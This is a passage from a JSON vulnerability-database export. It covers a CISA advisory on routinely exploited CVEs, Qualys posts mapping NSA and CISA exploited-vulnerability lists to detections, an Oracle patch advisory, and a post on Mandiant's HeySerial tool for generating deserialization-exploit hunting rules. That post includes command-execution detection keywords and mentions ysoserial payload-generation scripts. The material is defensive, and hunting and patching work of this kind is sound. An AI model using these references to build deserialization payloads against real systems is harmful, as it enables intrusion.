"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-28T12:00:00", "type": "ics", "title": "2021 Top Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-0171", "CVE-2018-13379", "CVE-2019-11510", "CVE-2019-18935", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-2509", "CVE-2021-1675", "CVE-2021-20016", "CVE-2021-20038", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-27852", "CVE-2021-31207", "CVE-2021-3156", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35464", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2022-04-28T12:00:00", "id": "AA22-117A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2023-06-13T14:57:59", "description": "[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96iyLi-WJuKHxzsUe2ew0LLbVkwXkKoWXWpcZ0mRX6YUdBo7uzVq0lxIihLA9awRncMpRG3Pz54Becx4VdqrQLs5gSE0N0eXTFeY3SvASRKmLUj29WSoNXUB9oiczpcdLkgyqQmTBmYpjyy432kXPM87zwjhA7s0hfpa0u5aqBPpNFNzCyggYVI4E/w640-h370/deserialization1.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96iyLi-WJuKHxzsUe2ew0LLbVkwXkKoWXWpcZ0mRX6YUdBo7uzVq0lxIihLA9awRncMpRG3Pz54Becx4VdqrQLs5gSE0N0eXTFeY3SvASRKmLUj29WSoNXUB9oiczpcdLkgyqQmTBmYpjyy432kXPM87zwjhA7s0hfpa0u5aqBPpNFNzCyggYVI4E/s1882/deserialization1.png>)\n\n \n\n\nProgrammatically create hunting rules for deserialization [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) with multiple\n\n * keywords (e.g. cmd.exe)\n * gadget chains (e.g. CommonsCollection)\n * object types (e.g. ViewState, Java, Python Pickle, PHP)\n * encodings (e.g. Base64, raw)\n * rule types (e.g. Snort, Yara)\n\n \n\n\n### Disclaimer\n\nRules generated by this tool are intended for hunting/research purposes and are not designed for high fidelity/blocking purposes.\n\nPlease _test thoroughly_ before deploying to any production systems.\n\nThe Yara rules are primarily intended for scanning web server logs. Some of the \"object prefixes\" are only 2 bytes long, so they can make large scans a bit slow. _(Translation: please don't drop them all into VT Retrohunt.)_\n\n### Usage\n\nHelp: `python3 heyserial.py -h`\n\nExamples:\n \n \n python3 heyserial.py -c 'ExampleChain::condition1+condition2' -t JavaObj python3 heyserial.py -k cmd.exe whoami 'This file cannot be run in DOS mode' python3 heyserial.py -k Process.Start -t NETViewState -e base64 \"base64+utf16le\" \n\n# Utils\n\n### utils/checkyoself.py\n\nThis is a tool to automate bulk testing of Snort and Yara rules on a variety of sample files.\n\nUsage: `python3 checkyoself.py [-y rules.yara] [-s rules.snort] [-o file_output_prefix] [--matches] [--misses] -d malware.exe malware.pcap`\n\nExamples: `python3 checkyoself.py -y rules/javaobj -s rules/javaobj -d payloads/javaobj pcaps --misses -o java_misses`\n\n### utils/generate_payloads.ps1\n\nYSoSerial.NET v1.34 payload generation. Run on Windows from the ./utils directory.\n\n * Source: <https://github.com/pwntester/ysoserial.net>\n * License: ysoserial.net_LICENSE.txt\n\n### utils/generate_payloads.sh\n\nYSoSerial payload generation. Run on Linux from the ./utils directory.\n\n * Source: <https://github.com/frohoff/ysoserial>\n * License: ysoserial_LICENSE.txt\n\n### utils/install_snort.sh\n\nInstalling Snort on a Debian based system was a bit finnicky for me, so I wrote my install notes here.\n\n_Use at your own risk _in a VM_ that _you have snapshotted recently_._\n\n### utils/server.py\n\nSimple Python script that runs an HTTP server on 127.0.0.1:12345 and accepts POST requests.\n\nHandy for generating test PCAPs.\n\n# License\n\nCopyright (C) 2021 Alyssa Rahman, Mandiant, Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at: [package root]/LICENSE.txt Unless required by applicable law or agreed to in writing, software [distributed](<https://www.kitploit.com/search/label/Distributed> \"distributed\" ) under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\n# Contributing\n\nCheck out the Developers' guide (DEVELOPERS.md) for more details on extending HeySerial!\n\n# Prior Work/Related Resources\n\nTools\n\n * [Deserialization-Cheat-Sheet](<https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet> \"Deserialization-Cheat-Sheet\" ) \u2013 @GrrrDog\n * [Ysoserial](<https://github.com/frohoff/ysoserial> \"Ysoserial\" ) \\- @frohoff\n * [MarshalSec](<https://github.com/frohoff/marshalsec> \"MarshalSec\" ) \\- @frohoff\n * [Ysoserial (forked)](<https://github.com/wh1t3p1g/ysoserial> \"Ysoserial \$forked\$\" ) \\- @wh1t3p1g\n * [Ysoserial.NET](<https://github.com/pwntester/ysoserial.net> \"Ysoserial.NET\" ) and [v2 branch](<https://github.com/pwntester/ysoserial.net/tree/v2> \"v2 branch\" ) \\- @pwntester\n * [ViewGen](<https://github.com/0xacb/viewgen> \"ViewGen\" ) \u2013 0xacb\n * [Rogue-JNDI](<https://github.com/veracode-research/rogue-jndi> \"Rogue-JNDI\" ) \\- @veracode-research\n\nVulnerabilities\n\n * Log4J ([CVE-2021-44228](<https://www.lunasec.io/docs/blog/log4j-zero-day/> \"CVE-2021-44228\" ))\n * Exchange ([CVE-2021-42321](<https://vulners.com/cve/CVE-2021-42321> \"CVE-2021-42321\" ))\n * Zoho ManageEngine ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189> \"CVE-2020-10189\" ))\n * Jira ([CVE-2020-36239](<https://oxalis.io/atlassian-jira-data-centers-critical-vulnerability-what-you-need-to-know/> \"CVE-2020-36239\" ))\n * Telerik ([CVE-2019-18935](<https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui> \"CVE-2019-18935\" ))\n * C1 CMS ([CVE-2019-18211](<https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7> \"CVE-2019-18211\" ))\n * Jenkins ([CVE-2016-9299](<https://nvd.nist.gov/vuln/detail/CVE-2016-9299> \"CVE-2016-9299\" ))\n * [What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.](<https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/> \"What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.\" ) \u2013 @breenmachine, FoxGloveSecurity (2015)\n\nTalks and Write-Ups\n\n * [PSA: Log4Shell and the current state of JNDI injection](<https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/> \"PSA: Log4Shell and the current state of JNDI injection\" ) \\- Moritz Bechler (2021)\n * [This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits> \"This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits\" ) \u2013 Chris Glyer, Dan Perez, Sarah Jones, Steve Miller (2020)\n * [Deep Dive into .NET ViewState deserialization and its exploitation](<https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817> \"Deep Dive into .NET ViewState deserialization and its exploitation\" ) \u2013 Swapneil Dash (2019)\n * [Exploiting ](<https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/> \"Exploiting\" )[Deserialization](<https://www.kitploit.com/search/label/Deserialization> \"Deserialization\" ) in ASP.NET via ViewState \u2013 Soroush Dalili (2019)\n * [Use of Deserialization in .NET Framework Methods and Classes](<https://research.nccgroup.com/wp-content/uploads/2020/07/whitepaper-new.pdf> \"Use of Deserialization in .NET Framework Methods and Classes\" ) \u2013 Soroush Dalili(2018)\n * [Friday the 13th, JSON Attacks](<https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf> \"Friday the 13th, JSON Attacks\" ) \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2017)\n * [Exploiting .NET Managed DCOM](<https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html> \"Exploiting .NET Managed DCOM\" ) \u2013 James Forshaw, Project Zero (2017)\n * [Java Unmarshaller Security](<https://github.com/frohoff/marshalsec/blob/master/marshalsec.pdf> \"Java Unmarshaller Security\" ) \u2013 Moritz Bechler (2017)\n * [Deserialize My Shorts](<https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization> \"Deserialize My Shorts\" ) \u2013 Chris Frohoff (2016)\n * [Pwning Your Java Messaging with Deserialization Vulnerabilities](<https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities-wp.pdf> \"Pwning Your Java Messaging with Deserialization Vulnerabilities\" ) \u2013 Matthias Kaiser (2016)\n * [Journey from JNDI/LDAP ](<https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf> \"Journey from JNDI/LDAP\" )[Manipulation](<https://www.kitploit.com/search/label/Manipulation> \"Manipulation\" ) to [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) Dream Land \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2016)\n * [Marshalling Pickles](<https://www.youtube.com/watch?v=KSA7vUkXGSg> \"Marshalling Pickles\" ) \u2013 Chris Frohoff and Gabriel Lawrence (2015)\n * [Are you my Type? Breaking .NET Through Serialization](<https://github.com/VulnerableGhost/.Net-Sterilized--Deserialization-Exploitation/blob/master/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf> \"Are you my Type? Breaking .NET Through Serialization\" ) \u2013 James Forshaw (2012)\n * [A Spirited Peek into ViewState](<https://deadliestwebattacks.com/2011/05/13/a-spirited-peek-into-viewstate-part-i/> \"A Spirited Peek into ViewState\" ) \u2013 Mike Shema (2011)\n\n \n\n\n**Author:** Alyssa Rahman @ramen0x3f\n\n**Created:** 2021-10-27\n\n**Last Updated:** 2021-12-02\n\n**Blog:** <https://www.mandiant.com/resources/hunting-deserialization-exploits>\n\nFor more details on this tool and the research process behind it, check out [our blog](<https://www.mandiant.com/resources/hunting-deserialization-exploits> \"our blog\" )!\n\n \n \n\n\n**[Download Heyserial](<https://github.com/mandiant/heyserial> \"Download Heyserial\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-12T21:30:00", "type": "kitploit", "title": "Heyserial - Programmatically Create Hunting Rules For Deserialization Exploitation With Multiple Keywords, Gadget Chains, Object Types, Encodings, And Rule Types", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299", "CVE-2019-18211", "CVE-2019-18935", "CVE-2020-10189", "CVE-2020-36239", "CVE-2021-42321", "CVE-2021-44228"], "modified": "2022-05-12T21:30:00", "id": "KITPLOIT:1207079539580982634", "href": "http://www.kitploit.com/2022/05/heyserial-programmatically-create.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-10-23T16:02:16", "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * ![](https://blog.qualys.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-22-at-10.32.04-AM-1-1070x479.png)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for "Active Attack" RTI:\n\n![](https://blog.qualys.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-22-at-10.43.47-AM-1-1070x535.png)\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-22-at-1.41.35-PM-1070x828.png)\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n![](https://blog.qualys.com/wp-content/uploads/2020/10/2020-10-22_12-45-21-1070x2407.png)\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "cvss3": {}, "published": "2020-10-22T23:10:29", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [_`_CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,` CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/CISA-VMDR-1070x494.png)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for \u201cActive Attack\u201d RTI:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/CISA-prioritization-1070x388.png)\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/rtaImage-1070x1838.png)\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2023-09-23T15:51:51", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 433 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2023 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2921644.1>).\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-04-18T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2023", "bulletinFamily": "software", "cvss2": {"severity": 